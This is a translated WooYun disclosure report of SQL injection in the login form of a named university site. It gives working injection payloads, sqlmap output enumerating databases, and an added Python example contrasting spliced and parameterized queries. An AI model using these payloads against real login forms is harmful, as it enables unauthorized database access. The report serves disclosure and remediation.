WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2014-12-20: Details reported to the vendor; awaiting vendor action
2014-12-22: Vendor confirmed; details visible to the vendor only
2015-01-01: Details disclosed to core white hats and domain experts
2015-01-11: Details disclosed to regular white hats
2015-01-21: Details disclosed to intern white hats
2015-02-03: Details disclosed to the public
Injection URL: http://stu.math.sdu.edu.cn/cms/login.php
Injection parameter: username
The form submission does not filter the username field, which allows SQL injection and exposes sensitive information. Enter as the username:
'having 1=1--
with any password. The response is:
Error!Description:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1Back:返回
Preliminary conclusion: the username field is vulnerable to POST-based SQL injection. Enter as the username, with any password:
admin' union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#
The response is:
Error!Description:Duplicate entry '1stu@localhost' for key 'group_key'Back:返回
That leaks the database user (stu@localhost), so it is time for the trusty sqlmap.
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: username=admin' AND 4227=4227 AND 'SkxV'='SkxV&password=admin

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin' AND (SELECT 4781 FROM(SELECT COUNT(*),CONCAT(0x7175677a71,(SELECT (CASE WHEN (4781=4781) THEN 1 ELSE 0 END)),0x7163657071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NnZN'='NnZN&password=admin

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=admin' AND SLEEP(5) AND 'qzHD'='qzHD&password=admin
---
[09:45:18] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[09:45:18] [INFO] fetching database names
[09:45:18] [INFO] the SQL query used returns 3 entries
[09:45:18] [INFO] resumed: information_schema
[09:45:18] [INFO] resumed: stu_maths
[09:45:18] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] stu_maths
[*] test
There is far too much data here, so I stopped at this point.
Fix suggestion: filter the input.
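The root cause and the fix side by side, as an added example that is not code from the report (login.php's own source is not shown): a login query that splices the username and password fields into the SQL string and echoes the driver error to the user, beside a parameterized version that also keeps errors server-side. It runs against an in-memory SQLite database with a constructed `users` table, so the MySQL-specific error-based payload is not reproduced, but the statement-breaking and boolean-logic payloads from the report show the same contrast.

```python
import logging
import sqlite3

# Added example, not the report's code. Table name, column names and the
# stored credential are constructed for the demonstration; the password is
# compared in plaintext only to keep the example short.

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return conn

def login_vulnerable(conn, username, password):
    # Both fields are spliced into the statement text, so a quote inside
    # `username` ends the literal and whatever follows is parsed as SQL.
    sql = (f"SELECT id FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing the raw DBMS error to the client is what turns a broken
        # statement into an information leak (the 'Error!Description:' page).
        return f"Error!Description:{exc}"
    return "ok" if row else "login failed"

def login_safe(conn, username, password):
    # Placeholders send the values to the driver separately from the statement
    # text, so user input can never change the shape of the query.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    try:
        row = conn.execute(sql, (username, password)).fetchone()
    except sqlite3.Error as exc:
        # Log the detail for the operator; the client only sees a generic result.
        logging.error("login query failed: %s", exc)
        return "login failed"
    return "ok" if row else "login failed"

if __name__ == "__main__":
    db = make_db()
    # The report's first probe and sqlmap's boolean-based payload.
    for user in ("'having 1=1--", "admin' AND 4227=4227 AND 'SkxV'='SkxV"):
        print(repr(user))
        print("  vulnerable:", login_vulnerable(db, user, "constructed-secret"))
        print("  safe:      ", login_safe(db, user, "constructed-secret"))
```

In the vulnerable function the boolean payload logs in as admin because the injected `AND` clauses are evaluated as SQL; in the safe function the same string is only ever compared against the username column.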
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2014-12-22 09:18
Vendor response: user notified, handling in progress
Details: none yet